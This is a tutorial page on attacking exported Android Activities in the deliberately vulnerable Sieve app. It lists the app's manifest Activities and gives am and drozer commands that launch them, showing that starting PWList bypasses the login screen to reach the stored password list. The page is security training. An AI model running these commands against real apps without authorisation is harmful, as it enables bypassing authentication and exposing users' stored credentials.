Skip to main content

Attacking Activities

By now, you should have analyzed the AndroidManifest.xml, and have notes of the Activity names, and if they are explicitly or implicitly exported. For this, I am using the intentionally vulnerable app Sieve, from WithSecureLabs.

Here are the Activity notes from the app:

[ACTIVITY] com.withsecure.example.sieve.activity.MainLoginActivity
  Exported: true
  [INTENT-FILTER]
    Actions:
      android.intent.action.MAIN
    Categories:
      android.intent.category.LAUNCHER

[ACTIVITY] com.withsecure.example.sieve.activity.FileSelectActivity
  Exported: true

[ACTIVITY] com.withsecure.example.sieve.activity.PWList
  Exported: true

[ACTIVITY] com.withsecure.example.sieve.activity.SettingsActivity
  Exported: Not explicitly defined

[ACTIVITY] com.withsecure.example.sieve.activity.AddEntryActivity
  Exported: Not explicitly defined

[ACTIVITY] com.withsecure.example.sieve.activity.ShortLoginActivity
  Exported: Not explicitly defined

[ACTIVITY] com.withsecure.example.sieve.activity.WelcomeActivity
  Exported: Not explicitly defined

[ACTIVITY] com.withsecure.example.sieve.activity.PINActivity
  Exported: Not explicitly defined

There are 3 Activities that are explicitly exported, and the MainLoginActivity includes an intent filter.

Access Exported Activities

Attempt to start the exported activities manually, to see how this functions and how we can further attack the app. Manually starting the Activity can be performed using the Activity Manager command (am).

note

These commands assume you are already in a shell of the Android device. Most likely through adb.

Start Activities

The basic command syntax is below. There are two ways to run this command, the full command & the shorthand method. I tend to use the shorthand version, but if that doesn't work then you will need to know the full command syntax.

# Full command
am start -n <package-id> <package-id>/.activity.<activity-name>

# Shorthand command
am start -n <package-id>/.activity.<activity-name>

com.withsecure.example.sieve.activity.MainLoginActivity

# Activity Manager command:
oriole:/ $ am start -n com.withsecure.example.sieve/.activity.MainLoginActivity                                                                          
Starting: Intent { cmp=com.withsecure.example.sieve/.activity.MainLoginActivity }

# Drozer command:
dz> run app.activity.start --component com.withsecure.example.sieve com.withsecure.example.sieve.activity.MainLoginActivity

On the device, the Sieve app will launch the MainLoginActivity which is the screen that allows the user to input their password. Do not login to the app. Kill the app so that it is no longer running in the background.

com.withsecure.example.sieve.activity.FileSelectActivity

# Activity Manager command:
oriole:/ $ am start -n com.withsecure.example.sieve/.activity.FileSelectActivity                                                                         
Starting: Intent { cmp=com.withsecure.example.sieve/.activity.FileSelectActivity }

# Drozer command:
dz> run app.activity.start --component com.withsecure.example.sieve com.withsecure.example.sieve.activity.FileSelectActivity

com.withsecure.example.sieve.activity.PWList

# Activity Manager command:
oriole:/ $ am start -n com.withsecure.example.sieve/.activity.PWList                                                                                     
Starting: Intent { cmp=com.withsecure.example.sieve/.activity.PWList }

# Drozer command:
dz> run app.activity.start --component com.withsecure.example.sieve com.withsecure.example.sieve.activity.PWList

This Activity bypasses the Login screen and immediately opens the app to the Password List on the device. However, it only shows you the Service and the Username. Tapping on an entry does not reveal the actual password since the Service isn't running.